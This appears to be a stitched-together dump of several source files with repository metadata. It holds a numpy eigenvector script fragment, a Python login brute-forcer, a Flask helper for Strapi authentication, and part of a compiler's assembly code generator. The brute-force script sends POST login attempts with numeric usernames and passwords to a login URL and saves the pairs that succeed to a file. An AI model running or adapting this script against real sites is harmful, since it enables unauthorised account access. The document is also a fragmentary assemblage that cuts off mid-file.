row.extend(wa2[j])
row.extend(wa3[j])
# row.extend(wa4[j])
krp.append(row)
print("Clearing variables...")
A1 = None
A2 = None
A3 = None
# A4 = None
influence_matrix = None
print("Setting up kr_product...")
kr_product = np.array(krp, dtype=np.float)
krp.clear()
print(kr_product.shape)
print(kr_product)
print("Calculating eigenvector...")
e = np.linalg.eig(kr_product)
e_val = e[0]
e_vec = e[1]
ind = list(e_val).index(max(e_val))
print(ind)
pev = e_vec[ind] / np.linalg.norm(e_vec[ind])
print(pev.shape)
print(pev)
print(sum(map(lambda x: x.real * x.real, pev)))
print("Saving eigenvector...")
with open("global_eigenvector_fc.txt", 'wb') as fp:
pickle.dump(pev, fp)
print("Saving eigenvalues...")
with open("eigenvalue_" + str(ind) + "_fc.txt", "wb") as fp:
pickle.dump(e_val[ind], fp)
print("Process finished!")
| 23.59 | 120 | 0.666808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 898 | 0.38067 |
aa027855d06ebca0a52e37c857218b627bb34991 | 2,066 | py | Python | brute.py | mirfansulaiman/python-bruteforce-script | bc1d7d92de37fa927c2fc4ddc1d1ef08ad361a26 | [
"Apache-2.0"
] | 1 | 2018-07-14T01:00:56.000Z | 2018-07-14T01:00:56.000Z | brute.py | mirfansulaiman/python-bruteforce-script | bc1d7d92de37fa927c2fc4ddc1d1ef08ad361a26 | [
"Apache-2.0"
] | null | null | null | brute.py | mirfansulaiman/python-bruteforce-script | bc1d7d92de37fa927c2fc4ddc1d1ef08ad361a26 | [
"Apache-2.0"
] | 1 | 2021-01-31T06:53:55.000Z | 2021-01-31T06:53:55.000Z | #!/usr/bin/env python
# Name : Simple Bruteforce v.0.1
# Author: mirfansulaiman
# Indonesian Backtrack Team | Kurawa In Disorder
# http://indonesianbacktrack.or.id
# http://mirfansulaiman.com/
# http://ctfs.me/
#
# have a bug? report to doctorgombal@gmail.com or PM at http://indonesianbacktrack.or.id/forum/user-10440.html
#
# Note : This tool for education only.
# Dont change author name !
import requests
import re
from random import randint, choice
from string import ascii_uppercase
import string, sys, os, time
RED = "\033[1;31;40m"
WHITE = "\033[1;37;40m"
GREEN = "\033[1;32;40m"
CYAN = "\033[1;36;40m"
PURPLE = "\033[1;35;40m"
TAG = "\033[0m"
def main():
count = 0
No = 20000
a = 30000
while No <= a:
url = "http://target.com"
Username = No
Password = No
payload = {
"login":"login",
"password":Password,
"username":Username,
}
headers = {}
timeout = 15
response = requests.request("POST", url, data=payload, headers=headers)
time.sleep(0.5)
count = count + 1
No = No + 1
print "------------------------------------"
print "{0}NO{1} : {2} | {3}[BRUTEFORCE]{4}".format(WHITE, TAG, count, RED, TAG)
print "{0}SEND{1} : {2}{3}{4} | {5}{6}{7} ".format(WHITE, TAG, CYAN, Username, TAG, PURPLE, Password, TAG)
gagal = re.search('Login ke Akun Anda', response.text)
result = re.search('Selamat Datang', response.text)
if result:
print "{0}STATUS{1} : {2}LOGIN SUCCESS{3}".format(WHITE,TAG,GREEN,TAG)
f = open("result2.txt", "a")
f.write("{0}:{1}\n".format(Username,Password))
f.close()
elif gagal:
print "{0}STATUS{1} : {2}LOGIN FAIL{3}".format(WHITE,TAG,RED,TAG)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print ' [Exit]'
try:
sys.exit(0)
except SystemExit:
os._exit(0) | 31.784615 | 114 | 0.549371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 789 | 0.381897 |
aa02c1541983ffc2ca4760a8ccd065899eae8b79 | 2,826 | py | Python | flask_strapi/__init__.py | ToraNova/flask-strapi | d777604326785c278137d1f4306978cf4192bf2f | [
"MIT"
] | 1 | 2022-01-08T23:48:17.000Z | 2022-01-08T23:48:17.000Z | flask_strapi/__init__.py | ToraNova/flask-strapi | d777604326785c278137d1f4306978cf4192bf2f | [
"MIT"
] | null | null | null | flask_strapi/__init__.py | ToraNova/flask-strapi | d777604326785c278137d1f4306978cf4192bf2f | [
"MIT"
] | null | null | null | import requests
import sys, traceback
from flask import session, abort
from werkzeug.local import LocalProxy
from functools import wraps
strapi_session = LocalProxy(lambda: _get_strapi_session())
null_session = LocalProxy(lambda: _get_null_session())
def clear_strapi_session():
_pop_strapi_session()
def _get_strapi_session():
return session.get('strapi') if session.get('strapi') else null_session
def _get_null_session():
return {'jwt': None, 'user': {}}
def _set_strapi_session(res):
j = res.json()
session['strapi'] = j
def _pop_strapi_session():
session.pop('strapi', None)
def authentication_required(fn):
@wraps(fn)
def decorated_view(*args, **kwargs):
if strapi_session.get('jwt') is None:
abort(401)
return fn(*args, **kwargs)
return decorated_view
class Strapi:
def __init__(self, url_base, login_path):
self.url_base = url_base
self.login_path = login_path
def request(self, path, method='get', **kwargs):
'''
request(path, method='get/post/put/delete', body={})
returns a request result (python-requests)
'''
_method = method.lower()
hdrs = {}
if 'headers' in kwargs:
hdrs = kwargs.pop('headers')
if isinstance(strapi_session.get('jwt'), str):
jwt = strapi_session.get('jwt')
if 'Authorization' not in hdrs:
hdrs['Authorization'] = f'Bearer {jwt}'
url = f'{self.url_base}{path}'
try:
if _method in ['post', 'put', 'delete']:
res = getattr(requests, _method)(url, headers=hdrs, **kwargs)
else:
# default to get request
res = requests.get(url, headers=hdrs, **kwargs)
return res
except requests.exceptions.ConnectionError:
raise requests.exceptions.ConnectionError('ConnectionError: connection to strapi cms failed')
except requests.exceptions.Timeout:
raise requests.exceptions.ConnectionError('Timeout: timeout error on request to strapi cms')
def authenticate(self, username, password):
'''
authenticate(username, password)
returns True if successfuly, False otherwise
'''
res = self.request(self.login_path, method='post', json={'identifier': username, 'password': password})
if res.status_code == 200:
_set_strapi_session(res)
return None
return res
class StrapiV3(Strapi):
def __init__(self, url_base = 'http://localhost:1337', login_path='/auth/local'):
super.__init__(url_base, login_path)
class StrapiV4(Strapi):
def __init__(self, url_base = 'http://localhost:1337', login_path='/api/auth/local'):
super.__init__(url_base, login_path)
| 31.752809 | 111 | 0.635527 | 1,990 | 0.704176 | 0 | 0 | 155 | 0.054848 | 0 | 0 | 632 | 0.223638 |
aa02cc1bd489b4bbbc4791b094845a1485411324 | 20,228 | py | Python | code_generation.py | irinaid/MAlice | 02740d661020866c3927b9ee7ee4523aaaafcb7e | [
"MIT"
] | 1 | 2021-04-25T22:53:36.000Z | 2021-04-25T22:53:36.000Z | code_generation.py | irinaid/MAlice | 02740d661020866c3927b9ee7ee4523aaaafcb7e | [
"MIT"
] | null | null | null | code_generation.py | irinaid/MAlice | 02740d661020866c3927b9ee7ee4523aaaafcb7e | [
"MIT"
] | null | null | null | from sys import stdout
from evaluate_expression import *
from operations_and_expressions import *
from write import *
# Pool of free scratch registers; genDecl/getFunctionArgs pop() from it
# when a variable needs a home.
regs = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
# Relational operators recognised when emitting comparisons.
relational_ops = [ ">", ">=", "<", "<=", "!=", "=="]
# Scope-prefixed variable name -> (location, type); the location is a
# register name or a memory operand such as "[rbp+16]" / "[label]".
allocationTable = {}
# File-scope variables: name -> (initial value, type).
globalTable = {}
# Stack of scope-name prefixes ("__<name>_" / "_scope_") used to build
# fully-qualified variable names.
stack = []
# Size of one stack slot in bytes (x86-64).
BYTE_SIZE = 8
# Counters used to generate unique labels for if/while constructs.
IF_NUMBER = 0
WHILE_NUMBER = 0
program = []
functions = []
# 0 while emitting the main body, 1 while emitting a user function.
PART = 0
# Counter for uniquely naming string literals in the data section.
STRING_COUNT = 0
# Entry point of code generation: emits the file-scope declarations,
# then every top-level function of the parse tree, and finally flushes
# the accumulated assembly to filePath.
def generate(tree, filePath):
    global PART

    tree = cleanList(tree)

    # Leading DECL nodes are file-scope variables; emit them first.
    idx = 0
    while tree[idx][0] == "DECL":
        globalDecl(tree[idx])
        idx += 1

    # A lone main function arrives unwrapped; normalise to a node list.
    if tree[0] == "MAINF":
        tree = [tree]

    # Node tag -> (PART value to select, emitter to invoke).
    dispatch = {
        "MAINF": (0, genMain),
        "VOIDF": (1, genVoid),
        "TYPEF": (1, genType),
    }
    for node in tree[idx:]:
        entry = dispatch.get(node[0])
        if entry is not None:
            PART, emitter = entry
            emitter(node)

    writeToFile(filePath)
# Emits the program entry point (the "main" label) from a MAINF node.
def genMain(tree):
    global PART

    PART = 0
    stack.append("__main_")
    write("main:\n")
    # The statement list of the main body lives at tree[4][1].
    genBlock(tree[4][1])
    PART = 0
    write("\tret\n")
    stack.pop()
# Generates the code for a void function, or a nested void/main
# ("hatta") function.  A MAINF node stores its argument list at index 2
# and its body at index 4 (the name is implicitly "hatta"); a VOIDF node
# stores name/args/body at indices 1, 3 and 5.
def genVoid(tree):
    global PART
    PART = 1
    if (tree[0] == "MAINF"):
        block = tree[4][1]
        args = tree[2]
        name = "hatta"
    else:
        block = tree[5][1]
        args = tree[3]
        name = tree[1]
    stack.append("__" + name + "_")
    write("\n_" + name + ":\n")
    if (len(args) > 0):
        # getFunctionArgs emits the "push rbp / mov rbp, rsp" prologue
        # itself.  Emitting it here as well (as this function previously
        # did) pushed rbp twice while the epilogue pops it only once,
        # which shifted every [rbp+N] argument offset by 8 and corrupted
        # the return address on "ret".
        getFunctionArgs(tree)
    else:
        write("\tpush rbp\n")
        write("\tmov rbp, rsp\n")
    genBlock(block)
    stack.pop()
    write("\tpop rbp\n")
    write("\tret\n")
    PART = 0
# Generates instructions equivalent to a value-returning ("type")
# function: label, prologue, body and epilogue.  A TYPEF node stores the
# function name at index 1, its argument list at index 3 and its body at
# index 7.
def genType(tree):
    global PART
    PART = 1
    stack.append("__" + tree[1] + "_")
    write("_"+tree[1]+":\n")
    args = tree[3]
    if (len(args) > 0):
        # getFunctionArgs emits the "push rbp / mov rbp, rsp" prologue.
        getFunctionArgs(tree)
    else:
        # Previously no prologue was emitted for argument-less functions,
        # so the unconditional "pop rbp" below popped the return address
        # into rbp and "ret" jumped to a garbage address.
        write("\tpush rbp\n")
        write("\tmov rbp, rsp\n")
    block = tree[7][1]
    genBlock(block)
    write("\tpop rbp\n")
    write("\tret\n")
    stack.pop()
    PART = 0
# Gets the arguments of a function and places them in registers
# (more precisely: emits the function prologue and records, in
# allocationTable, the [rbp+N] stack slot each caller-pushed argument
# occupies).  With one push of rbp, the first argument sits at
# [rbp + 8*len(args) + 8] and later arguments at successively lower
# offsets.
#
# NOTE(review): aux_reg is popped from the register pool but never used
# or returned, so every argument permanently removes one scratch
# register from the pool -- confirm whether this reservation is
# intentional or a leak.
# NOTE(review): arguments are read from tree[3] and the scope prefix
# from tree[1]; this does not match the MAINF node layout used by
# genVoid (args at tree[2], name "hatta") -- verify for nested mains.
def getFunctionArgs(tree):
    args = tree[3]
    # A single argument arrives as a flat triple; normalise to a list
    # of triples.
    if (not type(args[0]) is list):
        args = [(args)]
    write("\tpush rbp\n")
    write("\tmov rbp, rsp\n")
    # Offset of the first (left-most) argument relative to rbp.
    rbp_count = len(args)*BYTE_SIZE + BYTE_SIZE
    prefix = "__" + tree[1] + "_"
    for arg in args:
        aux_reg = regs.pop()
        # arg[1] is the argument name, arg[2] its declared type.
        var = prefix + arg[1]
        allocationTable.update({var:("[rbp+"+
            str(rbp_count)+"]", arg[2])})
        rbp_count -= BYTE_SIZE
# Assigns a value to a local variable.
# Emits code for an ASSIGN node (["ASSIGN", name, expr]).  Three cases:
#  * a file-scope variable lives in memory, so the expression is
#    evaluated into a scratch register and then stored back;
#  * a string value is emitted as a labelled `dd` entry in the data
#    section and the label is moved into the variable's location;
#  * anything else (ints/chars) is evaluated straight into the
#    variable's register.
def genAssign(tree):
    global stack
    global allocationTable
    global regs
    global STRING_COUNT  # declared but not modified in this function
    # If it's a global variable, we need an extra mov
    if (tree[1] in globalTable and
        getScopePlusVar(tree[1]) == tree[1]):
        reg = regs.pop()
        writeMov(reg,
            genExpr(tree[2], getRegisterInScope(tree[1])))
        writeMov(getRegisterInScope(tree[1]), reg)
    else:
        # If the value is a string, declare it in the data section
        if (isString(cleanToFirstValue(tree[2]))):
            # comp is the operand currently allocated to the target
            # (may be "" when the variable has no location yet).
            comp = getRegisterInScope(tree[1])
            # NOTE(review): operand strings are never allocationTable
            # keys, and "comp != comp.__getitem__(0)" is true for any
            # operand longer than one character, so this branch is
            # taken in practice -- confirm the intended condition.
            if (not comp in allocationTable or comp != comp.__getitem__(0)):
                # Strip the surrounding quotes from the literal.
                value = cleanToFirstValue(tree[2])[1:-1]
                writeToDataSection("\t"+tree[1]+" dd `"+
                    str(value)+"`,0\n")
                writeMov(getRegisterInScope(tree[1]), tree[1])
                return
            value = cleanToFirstValue(tree[2])[1:-1]
            writeToDataSection("\t"+tree[1]+" dd `"+
                str(value)+"`,0\n")
            if (getRegisterInScope(tree[1]) == ""):
                reg = tree[1]
                writeMov(regs.pop(), tree[1])
            else:
                reg = getRegisterInScope(tree[1])
                writeMov(regs.pop(), getRegisterInScope(tree[1]))
        # If it's a char or int, just put it in a register directly
        else:
            reg = getRegisterInScope(tree[1])
            value = genExpr(tree[2], reg)
            if (reg != value):
                writeMov(reg, value)
# Declares a local variable: takes a scratch register from the pool and
# records it in allocationTable under the scope-qualified name.  A
# five-element DECL node also carries an initial value, which is emitted
# as an ordinary assignment.  Returns the register given to the
# variable.
def genDecl(tree):
    scoped_name = getAllStack() + tree[1]
    register = regs.pop()
    allocationTable[scoped_name] = (register, tree[2])
    if len(tree) == 5:
        genAssign(["ASSIGN", tree[1], tree[4]])
    return register
# Global variables
def globalDecl(tree):
    """Declare a global variable.

    STRING globals are registered in the allocation table only (their
    data-section entry is emitted by genAssign); numeric globals get a
    zero-initialised `dd` slot and a "[name]" memory operand, plus an
    entry in globalTable.  Nodes with more than 3 elements carry an
    initial value in tree[4].
    """
    global allocationTable
    global globalTable
    if (tree[2] == "STRING"):
        allocationTable.update({tree[1]:(tree[1], tree[2])})
        if (len(tree) == 3):
            # NOTE(review): tree[1] was just inserted into
            # allocationTable above, so `not tree[1] in allocationTable`
            # is always False here and this genAssign never runs --
            # confirm whether a default-initialisation was intended.
            if (not tree[1] in allocationTable and
                    tree[1] != allocationTable[tree[1]].__getitem__(0)):
                genAssign(["ASSIGN", tree[1], "0"])
        else:
            genAssign(["ASSIGN", tree[1], tree[4]])
        return
    # Reserve a zero-initialised word in the data section.
    writeToDataSection("\t" + tree[1] + " dd")
    writeToDataSection(" 0\n")
    allocationTable.update({tree[1]:("["+tree[1]+"]", tree[2])})
    globalTable.update({tree[1]:(0, tree[2])})
    if (len(tree) > 3):
        genAssign(["ASSIGN", tree[1], tree[4]])
# Generates a block of code into assembly code.
def genBlock(tree):
    """Walk a block of parsed statements and dispatch each node to its
    code generator, keyed on the node tag in t[0].

    A single statement (first element not a list) is wrapped so the
    loop can treat everything uniformly.  "OPEN" nodes push an
    anonymous scope prefix while their inner block is generated;
    function nodes (MAINF/TYPEF/VOIDF) push a per-function prefix.
    """
    global regs
    global stack
    global allocationTable
    if (not type(tree[0]) is list):
        tree = [tree]
    for t in tree:
        # Nested scope: generate its contents under a "_scope_" prefix.
        if(t[0] == "OPEN"):
            stack.append("_scope_")
            genBlock(t[1])
            stack.pop()
        if(t[0] == "DECL"):
            genDecl(t)
        elif(t[0] == "ASSIGN"):
            genAssign(t)
        elif(t[0] == "IF"):
            genIf(t)
        elif(t[0] == "WHILE"):
            genWhile(t)
        elif(t[0] == "PRINT"):
            genPrint(t)
        elif(t[0] == "RET"):
            genRet(t)
        elif(t[0] == "DEC" or t[0] == "INC"):
            genIncDec(t)
        elif(t[0] == "READ"):
            genRead(t)
        elif(t[0] == "FULLSTOP"):
            continue
        # Main function: generated under the fixed "__hatta_" prefix.
        elif(t[0] == "MAINF"):
            stack.append("__hatta_")
            genVoid(t)
            stack.pop()
        elif(t[0] == "TYPEF"):
            stack.append("__" + t[1] + "_")
            genType(t)
            stack.pop()
        elif(t[0] == "VOIDF"):
            stack.append("__" + t[1] + "_")
            genVoid(t)
            stack.pop()
        # Bare call statement: <name> LPAREN <args> RPAREN.
        # NOTE(review): an unmatched node shorter than 4 elements would
        # raise IndexError on t[3] here -- confirm the parser never
        # produces such nodes.
        elif(t[1] == "LPAREN" and type(t[2]) is list and
                t[3] == "RPAREN" and (not (t[0] == "IF"))
                and (not (t[0] == "WHILE"))):
            genFunctionCall(t)
# Print function in assembly.
def genPrint(tree):
    """Emit a printf call for a PRINT node.

    Four shapes are handled: a function call (result taken from rax),
    a literal value (strings get a fresh s<N> data-section entry),
    a single variable (format chosen from its recorded type), and a
    multi-token expression (evaluated with genExpr, printed as int).
    The printf calling convention used is rax=0, rsi=value,
    rdi=format-string label.
    """
    global allocationTable
    global regs
    global stack
    global STRING_COUNT
    value = tree[1]
    varStart = ""
    printType = ""
    # If we want to print a function call
    if (type(tree[1]) is list and len(tree[1]) == 4 and
            tree[1][1] == "LPAREN" and tree[1][3] == "RPAREN"):
        genFunctionCall(tree[1])
        reg = regs.pop()
        writeMov(reg, "rax")
        varStart = reg
        printType = "writeInt"
        regs.append(reg)
    # If we want to print a value directly
    elif (getRegisterInScope(cleanToFirstValue(value)) == ""
            and isValue(value)):
        # Special case for printing a string
        if (isString(cleanToFirstValue(value))):
            # Strip the surrounding quotes and intern the literal in
            # the data section under a generated s<N> label.
            value = cleanToFirstValue(tree[1])[1:-1]
            writeToDataSection("\ts"+str(STRING_COUNT)+" dd `"+
                str(value)+"`, 0\n")
            allocationTable.update({"s"+str(STRING_COUNT):(value, "STRING")})
            varStart = "s"+str(STRING_COUNT)
            printType = getPrintType("STRING")
            STRING_COUNT += 1
        else:
            varStart = cleanToFirstValue(value)
            printType = getPrintType(value)
    # If we want to print a variable content
    elif (len(value) == 1 and
            getRegisterInScope(cleanToFirstValue(value)) != ""):
        value = getScopePlusVar(value)
        printType = allocationTable[value].__getitem__(1)
        printType = getPrintType(printType)
        varStart = getRegisterInScope(value)
    elif (len(value) > 1):
        # Multiple cases, should use genExpr
        varStart = genExpr(value, varStart)
        printType = "writeInt"
    writeMov("rax", "0")
    writeMov("rsi", varStart)
    writeMov("rdi", printType)
    write("\tcall printf\n")
def genRet(tree):
    """Emit code that leaves a RET node's value in rax.

    Handles a negated value, a bitwise-not value, and the plain case
    where the returned variable/literal is moved into rax (memory
    operands are staged through a scratch register first).
    """
    global regs
    # If the function returns a negative variable
    if (type(tree[1]) is list and tree[1][0] == "-"):
        # NOTE(review): genExpr replaces tree[1] with a register/operand
        # string, so the subsequent negate() sees a string (not the
        # ["-", operand] list it checks for) and silently does nothing;
        # confirm the intended interaction.
        tree[1] = genExpr(tree[1], "rax")
        negate(tree[1], "rax")
    # If the function returns not value
    elif (type(tree[1]) is list and tree[1][0] == "~"):
        reg = regs.pop()
        writeMov(reg, getRegisterInScope(tree[1][1]))
        write("\tnot " + reg + "\n")
        writeMov("rax", reg)
        regs.append(reg)
    else:
        tree = cleanList(tree)
        # If the function returns
        if (len(tree) > 1):
            to_return = getScopePlusVar(tree[1])
            if (to_return != ""):
                to_return = allocationTable[to_return]
                to_return = to_return.__getitem__(0)
                # Memory operands ("[...]") cannot be moved directly to
                # rax here; stage through a scratch register.
                if (to_return[0] == "["):
                    aux_reg = regs.pop()
                    writeMov(aux_reg,to_return)
                    to_return = aux_reg
                    regs.append(aux_reg)
            else:
                to_return = tree[1]
            writeMov("rax", to_return)
# Reads input using gcc function scanf
def genRead(tree):
    """Emit a scanf call that reads input into the variable tree[1].

    A one-byte s<N> buffer is declared in the data section, scanf
    fills it using the format matching the variable's recorded type,
    and the result is copied to the variable's storage via rbx.
    """
    global STRING_COUNT
    scoped = getScopePlusVar(tree[1])
    entry = allocationTable[scoped]
    scan_type = entry[1]
    storage = entry[0]
    write("\txor rax, rax\n")
    writeMov("rdi", getPrintType(scan_type))
    buffer_label = "s" + str(STRING_COUNT)
    writeToDataSection("\t" + buffer_label + " db 0\n")
    writeMov("rsi", buffer_label)
    write("\tcall scanf\n")
    writeMov("rbx", "[" + buffer_label + "]")
    writeMov(storage, "rbx")
    STRING_COUNT += 1
# Generates the operations to calculate the value of an expression
def genExpr(tree, startVar):
    """Generate code computing an expression's value.

    Returns the operand holding the result: a literal for a bare
    value, otherwise *startVar* (a fresh register is popped when
    startVar is "").  Sub-expressions are evaluated recursively; the
    flat operand/operator sequence is then folded strictly left to
    right -- there is no operator precedence.
    """
    global regs
    if (startVar == ""):
        startVar = regs.pop()
    if (len(tree) == 1):
        if (isValue(tree)):
            return cleanToFirstValue(tree)
        # NOTE(review): a single-element non-value falls through to the
        # general folding below, which then treats it as an operand.
    elif (len(tree) == 2):
        # Unary operators: ["~", x] or ["-", x].
        reg = getRegisterInScope(cleanToFirstValue(tree[1]))
        if (reg == ""):
            reg = cleanToFirstValue(tree[1])
        if (tree[0] == "~"):
            writeMov(startVar, reg)
            write("\tnot ", startVar, "\n")
            return startVar
        elif(tree[0] == "-"):
            writeMov(startVar, reg)
            write("\tneg ", startVar, "\n")
            return startVar
    #solve subExpressions of current expression
    #and replace the variables with their values
    for i in range(len(tree)):
        if (len(tree[i]) > 1):
            newStartVar = regs.pop()
            tree[i] = genExpr(tree[i], newStartVar)
        else:
            #!!This if below might cause trouble, it should actually
            #check that tree[i] is not an operand
            if (i%2 == 0):
                #If I have a value in my expression, e.g. x + 2
                if (isValue(tree[i])):
                    tree[i] = cleanToFirstValue(tree[i])
                else:
                    tree[i] = getRegisterInScope(tree[i])
    #solve this expression
    writeMov(startVar, tree[0])
    # Fold operator/operand pairs left to right into startVar.
    while (len(tree) >= 3):
        writeOp(startVar, tree[1], tree[2])
        tree = tree[2:]
    return startVar
# Inc, Dec
def genIncDec(tree):
    """Emit an x86 inc/dec on the storage location of tree[1]:
    DEC nodes become `dec`, anything else becomes `inc`."""
    global allocationTable
    mnemonic = "dec" if tree[0] == "DEC" else "inc"
    location = allocationTable[getScopePlusVar(tree[1])][0]
    write("\t", mnemonic, " ", location, "\n")
# Generates a function call
def genFunctionCall(tree):
    """Emit a call to the user function tree[0].

    Each argument is pushed on the machine stack (variables use their
    recorded storage; literals are first materialised through genDecl,
    which allocates a register for them), then `call _<name>` is
    emitted and the stack pointer is restored past the pushed args.
    """
    global BYTE_SIZE
    args = tree[2]
    # A single argument arrives unwrapped; normalise to a list.
    if (len(args) == 1):
        args = [args]
    if (len(args) == 0):
        write("\tcall _" + tree[0] + "\n")
    else:
        for arg in args:
            var = getScopePlusVar(arg)
            # If argument is a variable
            if (var != ""):
                var = allocationTable[var].__getitem__(0)
            # If it's a value
            else:
                arg = cleanToFirstValue(arg)
                declTree = ["DECL", cleanToFirstValue(arg)]
                if (isString(arg)):
                    declTree.append('STRING')
                elif (isChar(arg)):
                    declTree.append('CHAR')
                else:
                    declTree.append('INT')
                # NOTE(review): the register genDecl pops for this
                # temporary is never returned to the pool.
                var = genDecl(declTree)
            write("\tpush " + var + "\n")
        write("\tcall _" + tree[0] + "\n")
        # Pop the arguments back off the stack after the call.
        write("\tadd rsp, " + str(BYTE_SIZE*len(args)) + "\n")
#Put in a variable the negative value of it
def negate(tree, startVar):
    """Emit code leaving the arithmetic negation of a unary-minus node
    ["-", <operand>] in *startVar*; does nothing for other shapes."""
    #Check tree is well formed
    if (len(tree) == 2 and tree[0] == '-'):
        # NOTE(review): `sign` and `variable` are assigned but unused.
        sign = tree[0]
        variable = tree[1][0]
        #If the value is already in a register
        # NOTE(review): getScopePlusVar returns the scoped table KEY,
        # not a storage operand -- getRegisterInScope was probably
        # intended; as written both branches emit equivalent code with
        # different sources.  Confirm intent.
        reg = getScopePlusVar(tree[1])
        if (reg != ""):
            writeMov(startVar, reg)
            write("\tneg ", startVar, "\n")
        #Else put the value in the register and negate it
        else:
            writeMov(startVar, tree[1][0])
            write("\tneg ", startVar, "\n")
################# IF, WHILE ######################
#Generates a while loop in assembly.
def genWhile(tree):
    """Emit assembly for a while-loop node.

    Layout: `while<N>:` label, condition (genBoolExpr leaves a
    trailing conditional jump that we complete with the exit label),
    loop body, an unconditional jump back to the test, and finally the
    `endWhile<N>:` label.
    """
    global WHILENUMBER
    WHILENUMBER += 1
    whileNumber = str(WHILENUMBER)
    write("while",whileNumber, ":\n")
    # Generates the condition.
    genBoolExpr(tree[2])
    # Jumps to the end of the while if the condition doesn't hold
    # (completes the "jne " emitted by genBoolExpr).
    write("endWhile",whileNumber,"\n")
    # Generates the body of the while loop.
    genBlock(tree[4])
    # BUGFIX: jump back to re-test the condition; without this the
    # emitted loop body could only ever execute once.
    write("\n\tjmp while", whileNumber, "\n")
    # Writes the label for the end of the loop.
    write("\nendWhile",whileNumber,":\n")
#IF 1 1
def genIf2(tree, ifNumber):
    """Emit the ELSE / ELSE_IF chain following an IF.

    Each clause gets its own `if<N>:` label.  ELSE clauses just emit
    their block; ELSE_IF clauses test their condition, jump to the
    next clause (or to endIf<ifNumber>) when false, emit their block,
    jump to endIf when done, and recurse for any remaining clauses.
    """
    global regs
    global IF_NUMBER
    IF_NUMBER += 1
    y = str(IF_NUMBER)
    write("\nif", y, ":\n")
    if(tree[0] == "ELSE"):
        genBlock(tree[1])
    elif(tree[0] == "ELSE_IF"):
        genBoolExpr(tree[2])
        if(tree[6] != "ENDIF"):
            #IF NOT TRUE. JUMP NEXT IF
            y = str(IF_NUMBER + 1)
            write("if", y , "\n")
        else:
            #If not true, jump endIf
            # NOTE(review): unlike the branch above, this write has no
            # trailing "\n" -- confirm the emitted assembly still
            # separates the jump target from the next line.
            write("endIf", ifNumber)
        genBlock(tree[5])
        #IF TRUE, JUMP ENDIF
        write("\n\tjmp endIf", ifNumber, "\n")
        if(tree[6] != "ENDIF"):
            genIf2(tree[7:], ifNumber)
#Generates boolean expressions if the initial condition is too complex.
def genBoolExpr2(tree):
    """Emit assembly for a compound boolean condition, leaving the
    result in al (1 = true, 0 = false) between a cond<N>: and
    endCond<N>: label pair.

    Handles a simple <lhs> <relop> <rhs> comparison (via setcc),
    short-circuiting '&&' and '||' chains, and '!' negation.
    """
    global relational_ops
    global IF_NUMBER
    global regs
    ifNumber = str(IF_NUMBER)
    # NOTE(review): doubling (rather than incrementing) IF_NUMBER keeps
    # cond labels unique only because IF_NUMBER is already >= 1 here;
    # confirm this was intended instead of IF_NUMBER += 1.
    IF_NUMBER += IF_NUMBER
    write("\ncond", ifNumber, ":\n")
    # Simple comparison: <lhs> <relop> <rhs>.
    if(len(tree) == 3 and tree[1] in relational_ops):
        varStart1 = regs.pop()
        # BUGFIX: genExpr takes (tree, startVar); the previous
        # 3-argument calls (with getAllStack()) raised TypeError at
        # runtime.  Matches the usage in genBoolExpr.
        genExpr(tree[0], varStart1)
        varStart2 = regs.pop()
        genExpr(tree[2], varStart2)
        write("\n\tcmp ",varStart1, ", ", varStart2,"\n")
        write("\tset",getSet(tree[1]), " al")
        #Restore the registers used
        regs.append(varStart1)
        regs.append(varStart2)
    elif(len(tree) > 1):
        if(tree[1] == "&&"):
            genBoolExpr2(tree[0])
            register = regs.pop()
            write("\n\tmovzx ",register ,", al\n")
            write("\tcmp ", register, ", 1\n")
            #If the condition is false, then jump at the end of
            #the condition with al = 0.
            write("\n\tjne endCond", ifNumber , "\n")
            #Restore the register used
            regs.append(register)
            genBoolExpr2(tree[2:])
        elif(tree[1] == "||"):
            genBoolExpr2(tree[0])
            register = regs.pop()
            write("\n\tmovzx ",register, ", al\n")
            write("\tcmp ", register, ", 1\n")
            #If the condition is true, then jump at the end of
            #the condition with al = 1.
            write("\n\tje endCond", ifNumber, "\n")
            #Restore the register used
            regs.append(register)
            genBoolExpr2(tree[2:])
    elif(tree[0] == "!"):
        genBoolExpr2(tree[1:])
        register = regs.pop()
        write("\n\tmovzx ",register, ", al\n")
        write("not ", register)
        write("cmp ", register, ", 1")
        write("\n\tjne endCond", ifNumber , "\n")
        #Restore the register used
        regs.append(register)
    write("\nendCond",ifNumber, ":\n")
#Generates a boolean expression.
def genBoolExpr(tree):
    """Emit a boolean test, ending in a trailing "jne " whose target
    the CALLER writes next (genIf/genWhile append the label).

    Simple <lhs> <relop> <rhs> comparisons emit cmp + the matching
    conditional jump directly; anything else is delegated to
    genBoolExpr2 (which leaves its result in al) and then compared
    against 1.
    """
    global relational_ops
    global IF_NUMBER
    global regs
    # A simple comparison: length 3 with a relational operator in the middle.
    if(len(tree) == 3 and tree[1] in relational_ops):
        varStart1 = regs.pop()
        genExpr(tree[0], varStart1)
        varStart2 = regs.pop()
        genExpr(tree[2], varStart2)
        write("\n\tcmp ",varStart1, ", ", varStart2,"\n")
        write("\t", getJump(tree[1]), " ")
        #Restore the registers used
        regs.append(varStart1)
        regs.append(varStart2)
    #If the expression is of type !=, etc
    elif(len(tree)==2 and tree[0] == "!"):
        genBoolExpr2(tree[1])
        register = regs.pop()
        write("\n\tmovzx ",register, ", al\n")
        # NOTE(review): these two writes lack the "\t"/"\n" used
        # elsewhere -- confirm the emitted assembly formats correctly.
        write("not ", register)
        write("cmp ", register, ", 1")
        write("\n\tjne ")
        #Restore the register used
        regs.append(register)
    else:
        # Compound condition: evaluate into al, then test it.
        genBoolExpr2(tree)
        register = regs.pop()
        write("\n\tmovzx ",register, ", al\n")
        write("cmp ", register, ", 1")
        write("\n\tjne ")
        #Restore the registers used
        regs.append(register)
#IF 1
def genIf(tree):
    """Emit assembly for an IF node.

    Layout: `if<N>:` label, condition (genBoolExpr leaves a trailing
    conditional jump that is completed here with either endIf<N> or
    the next clause's label), the THEN block in tree[5], a jump to
    endIf, the ELSE/ELSE_IF chain in tree[6:] via genIf2, and the
    final `endIf<N>:` label.
    """
    global regs
    global IF_NUMBER
    IF_NUMBER += 1
    ifNumber = str(IF_NUMBER)
    #IF 1
    write("\nif", ifNumber, ":\n")
    genBoolExpr(tree[2])
    #If the condition doesn't hold, JUMP
    if(tree[6] == "ENDIF"):
